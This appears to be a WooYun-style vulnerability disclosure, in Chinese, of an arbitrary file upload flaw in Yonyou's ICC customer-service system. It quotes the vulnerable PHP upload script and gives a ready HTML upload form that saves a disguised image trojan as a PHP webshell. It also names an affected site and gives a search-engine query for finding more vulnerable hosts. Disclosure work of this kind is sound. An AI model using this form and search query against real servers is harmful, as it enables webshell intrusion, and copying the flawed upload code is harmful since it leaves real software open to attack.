再暴用友ICC网站客服系统任意文件上传漏洞

### 简要描述： 再暴用友ICC网站客服系统任意文件上传漏洞，看了一下上一个漏洞：http://www.wooyun.org/bugs/wooyun-2010-04685，发现还存在其它的上传漏洞。 ### 详细说明： 再暴用友ICC网站客服系统任意文件上传漏洞，看了一下上一个漏洞： [WooYun: 用友ICC网站客服系统远程代码执行漏洞](http://www.wooyun.org/bugs/wooyun-2012-04685) ，发现还存在其它的上传漏洞。 不知是不是还没升级完成或是什么问题，但测试多个网站均存在漏洞。 /home/ecccs/web/5107https://images.seebug.org/upload/screenImagesSave.php(相关上传的也同样有) ``` <?php /** * screenImagesSave.php * */ require_once('../global.inc.php'); //get request. $ft = intval($_REQUEST['ft']); /* chdir($CONFIG["canned_file_tmp"]); exec("rm -rf *"); */ $date = date("Ymd"); $dest = $CONFIG->basePath.'data/files/'.$date."/"; if (!is_dir($dest)) mkdir($dest, 0777); $filename = paramsFmt(urldecode($_GET["filename"])); $nameExt = strtolower($COMMON->getFileExtName($_FILES['file']['name'])); $unallowedType = array('php', 'jsp', 'asp', 'sh', 'pl', 'js', 'jar', 'jad', 'class', 'java'); if(in_array($nameExt, $unallowedType)){ if($ft == '1'){ echo 'pe'; }else if($ft == '2'){ echo 'fe'; } exit; } /* if (empty($filename)) $filename = date("Ymdhms")."_noname.file"; echo $date."/".$filename; */ $filenameNew = $dest.$filename; if(empty($_FILES["file"]['error'])){ move_uploaded_file($_FILES["file"]["tmp_name"],$filenameNew); } if(file_exists($filenameNew)){ echo(urlencode($CONFIG->baseUrl.'data/files/'.$date."/".$filename)); @chmod($filenameNew, 0444); }else{ if($ft == '1'){ echo 'pe'; }else if($ft == '2'){ echo 'fe'; } } ?> ``` 注意到 filename 没有？有验证上传文件的类型，但保存的文件名却为：filename GET的参数。晕了。。 ``` <form id="QuickSearch" name="QuickSearch" enctype="multipart/form-data" method="post" action="http://xxx.xxxx.com/5107https://images.seebug.org/upload/screenImagesSave.php?filename=xx.php"> <input type="file" name="file"> <input type="submit" name="QuickSearchBtn" value="上传"> </form> ``` 上传一个 jpg 的图片木马，即上传成功为xx.php的马。 测试了： http://icc.5107.cn/ 和Google搜索的 等都存在。 查找： https://www.google.com/search?q=inurl:/5107https://images.seebug.org/upload/upload.php&hl=en&noj=1&prmd=imvns&ei=E12mT4ugCcKjiQf7ofnHAw&start=10&sa=N&filter=0&biw=1366&bih=618 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201205/06200857d406a6cc8f69f9c0cd59a5a8ee5fbc7f.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201205/06200857d406a6cc8f69f9c0cd59a5a8ee5fbc7f.jpg)